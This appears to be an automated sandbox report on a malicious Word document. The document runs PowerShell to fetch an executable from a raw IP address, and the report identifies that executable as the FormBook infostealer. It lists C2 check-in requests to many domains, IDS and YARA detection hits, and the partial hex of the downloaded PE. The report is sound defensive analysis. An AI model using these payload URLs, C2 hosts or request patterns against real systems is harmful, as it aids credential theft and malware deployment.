          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exeJump to behavior
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: docsc[1].exe.0.drJump to dropped file
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.boostcoachingonline.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 157.55.173.72:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 202.210.8.86:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 107.155.89.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 44.230.85.241:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rogegalmish.com/a8si/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.thepocket-onlinelesson.xyz
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 May 2021 09:33:33 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 12 May 2021 07:52:57 GMTETag: "edc00-5c21d4c824840"Accept-Ranges: bytesContent-Length: 973824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 12 May 2021 09:33:42 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Wed, 12 May 2021 07:52:57 GMTETag: "edc00-5c21d4c824840"Accept-Ranges: bytesContent-Length: 973824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Host: 157.55.173.72Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.applewholesales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1Host: www.southernbrushworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.betsysellsswfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1Host: www.ethereumdailypay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.foreverjsdesigns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 75.2.115.196 75.2.115.196
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: VECTANTARTERIANetworksCorporationJP VECTANTARTERIANetworksCorporationJP
          Source: global trafficHTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.55.173.72Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: unknownTCP traffic detected without corresponding DNS query: 157.55.173.72
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8ADCC7F3-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 157.55.173.72Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /goose/docsc.exe HTTP/1.1Host: 157.55.173.72Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1Host: www.boostcoachingonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.thepocket-onlinelesson.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.applewholesales.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1Host: www.southernbrushworks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.betsysellsswfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1Host: www.ethereumdailypay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?bzrD=k28hoff2RzuOUW33PbGIPtKRPUr4n64pf9qOap2xi7OmRFd8c0vHG7pxTFlCjwyFI3/RUg==&yxl4A=IJB8SptPOV HTTP/1.1Host: www.foreverjsdesigns.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /a8si/?yxl4A=IJB8SptPOV&bzrD=O3o1U+q5oLWwAo4csM4kzZFzuvGZx18F2JtzSgoGolufYTqxaY4hRtZqS8lk7vb9Od8wBg== HTTP/1.1Host: www.4520oceanviewavenue.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.boostcoachingonline.com
          Source: powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpString found in binary or memory: httP://157.55.
          Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpString found in binary or memory: httP://157.55.17
          Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpString found in binary or memory: httP://157.55.173.72/go
          Source: powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpString found in binary or memory: httP://157.55.173.72/goose/do
          Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpString found in binary or memory: httP://157.55.173.72/goose/docsc
          Source: powershell.exe, 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmpString found in binary or memory: httP://157.55.173.72/goose/docsc.exe
          Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2107002569.0000000003663000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.2107752649.00000000035DC000.00000004.00000001.sdmpString found in binary or memory: httP://157.55.173.72/goose/docsc.exePE1
          Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmpString found in binary or memory: http://157.55.173.72
          Source: powershell.exe, 00000003.00000002.2110804206.000000000379A000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.2113476855.000000001BA55000.00000004.00000001.sdmpString found in binary or memory: http://157.55.173.72/goose/docsc.exe
          Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: powershell.exe, 00000003.00000002.2100780380.0000000002340000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2096222318.0000000002270000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2097117597.0000000002400000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://KK
          Source: powershell.exe, 00000003.00000002.2097620133.000000000034E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2095022345.000000000024E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2096210850.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.2354005709.0000000000340000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.2353725750.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.docsc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.docsc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Editing when opening. 0 Page: I of 2 Words: 539 N@m 13 ;a 10096 G) FI G) ,, =1'L'm')
